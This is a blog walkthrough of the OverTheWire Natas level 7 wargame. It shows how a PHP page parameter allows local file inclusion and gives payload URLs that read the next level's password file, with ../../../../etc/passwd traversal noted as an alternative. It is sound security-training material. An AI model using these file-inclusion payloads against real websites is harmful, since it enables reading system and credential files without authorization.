Skip to main content

Natas Level 7

Shubham
Cybersecurity Enthusiast

Natas 7

Solution

if we click on about, the web server will append /index.php?page=about to the end of the url
if we view the page source ../ we see a comment in both pages:
hint: password for webuser natas8 is in /etc/natas_webpass/natas8

if we try to visit /etc/natas_webpass/natas8 directly ... we will encounter Not Found error.

but if we try to visit it while we are in home ... that is: http://natas7.natas.labs.overthewire.org/index.php?page=home/etc/natas_webpass/natas8

we will get a warning which goes like

Warning: include(home/etc/natas_webpass/natas8): failed to open stream: No such file or directory in /var/www/natas/natas7/index.php on line 21

Warning: include(): Failed opening 'home/etc/natas_webpass/natas8' for inclusion (include_path='.:/usr/share/php') in /var/www/natas/natas7/index.php on line 21

error messages are frequently useful for getting a working exploit ... you can see that the web server tried and failed to open filename "home", and also told us the file path.
from here ... we can either use an absolute file path (ex: /etc/passwd) or a relative file path (../../../../etc/passwd).

lets use the absolute file path option, and navigate to http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8. This will include the flag file and display it to us.

<!-- truncate -->